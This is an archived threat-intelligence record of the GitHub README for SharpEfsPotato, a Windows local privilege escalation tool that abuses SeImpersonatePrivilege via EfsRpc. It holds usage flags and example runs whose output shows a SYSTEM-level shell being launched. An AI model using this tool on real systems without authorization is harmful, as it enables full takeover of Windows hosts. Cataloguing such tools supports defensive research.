{ "id": "82ed4022-6373-48f5-b120-467329eb5e80", "created_at": "2026-04-06T00:10:24.490768Z", "updated_at": "2026-04-10T13:11:40.699474Z", "deleted_at": null, "sha1_hash": "c098f36419d75afd90e966633f741ed3e66ec540", "title": "GitHub - bugch3ck/SharpEfsPotato: Local privilege escalation from SeImpersonatePrivilege using EfsRpc.", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 58071, "plain_text": "GitHub - bugch3ck/SharpEfsPotato: Local privilege escalation\r\nfrom SeImpersonatePrivilege using EfsRpc.\r\nBy bugch3ck\r\nArchived: 2026-04-05 23:19:59 UTC\r\nFolders and files\r\nName Name Last commit message Last commit date\r\nLatest commit\r\nUpdate README.md\r\nOct 17, 2022\r\n23c9079 · Oct 17, 2022\r\nHistory\r\n2 Commits\r\nSharpEfsPotato SharpEfsPotato Add project files. Oct 17, 2022\r\n.gitattributes .gitattributes Add project files. Oct 17, 2022\r\n.gitignore .gitignore Add project files. Oct 17, 2022\r\nREADME.md README.md Update README.md Oct 17, 2022\r\nSharpEfsPotato.sln SharpEfsPotato.sln Add project files. Oct 17, 2022\r\nREADME\r\nhttps://github.com/bugch3ck/SharpEfsPotato\r\nPage 1 of 3\n\nLocal privilege escalation from SeImpersonatePrivilege using EfsRpc.\r\nBuilt from SweetPotato by @EthicalChaos and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.\r\nUsage\r\nC:\\temp\u003eSharpEfsPotato.exe -h\r\nSharpEfsPotato by @bugch3ck\r\n Local privilege escalation from SeImpersonatePrivilege using EfsRpc.\r\n Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.\r\n -p, --prog=VALUE Program to launch (default cmd.exe)\r\n -a, --args=VALUE Arguments for program (default null)\r\n -h, --help Display this help\r\nExamples\r\nDefault behavior: Start cmd.exe as system in a separate process (in separate console)\r\nC:\\temp\u003eSharpEfsPotato.exe\r\nSharpEfsPotato by @bugch3ck\r\n Local privilege escalation from SeImpersonatePrivilege using EfsRpc.\r\n Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.\r\n[+] Triggering name pipe access on evil PIPE \\\\localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/\\44259a4a-cbe\r\ndf1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:\r\n[x]RpcBindingSetAuthInfo failed with status 0x6d3\r\n[+] Server connected to our evil RPC pipe\r\n[+] Duplicated impersonation token ready for process creation\r\n[+] Intercepted and authenticated successfully, launching program\r\n[+] Process created, enjoy!\r\nSpecify PowerShell binary and arguments\r\nC:\\temp\u003eSharpEfsPotato.exe -p C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -a \"whoami | Set-Conten\r\nSharpEfsPotato by @bugch3ck\r\n Local privilege escalation from SeImpersonatePrivilege using EfsRpc.\r\n Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.\r\n[+] Triggering name pipe access on evil PIPE \\\\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\\c56e1f1f-f91\r\ndf1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:\r\nhttps://github.com/bugch3ck/SharpEfsPotato\r\nPage 2 of 3\n\n[x]RpcBindingSetAuthInfo failed with status 0x6d3\r\n[+] Server connected to our evil RPC pipe\r\n[+] Duplicated impersonation token ready for process creation\r\n[+] Intercepted and authenticated successfully, launching program\r\n[+] Process created, enjoy!\r\nC:\\temp\u003etype C:\\temp\\w.log\r\nnt authority\\system\r\nSource: https://github.com/bugch3ck/SharpEfsPotato\r\nhttps://github.com/bugch3ck/SharpEfsPotato\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "origins": [ "web" ], "references": [ "https://github.com/bugch3ck/SharpEfsPotato" ], "report_names": [ "SharpEfsPotato" ], "threat_actors": [], "ts_created_at": 1775434224, "ts_updated_at": 1775826700, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c098f36419d75afd90e966633f741ed3e66ec540.pdf", "text": "https://archive.orkl.eu/c098f36419d75afd90e966633f741ed3e66ec540.txt", "img": "https://archive.orkl.eu/c098f36419d75afd90e966633f741ed3e66ec540.jpg" } }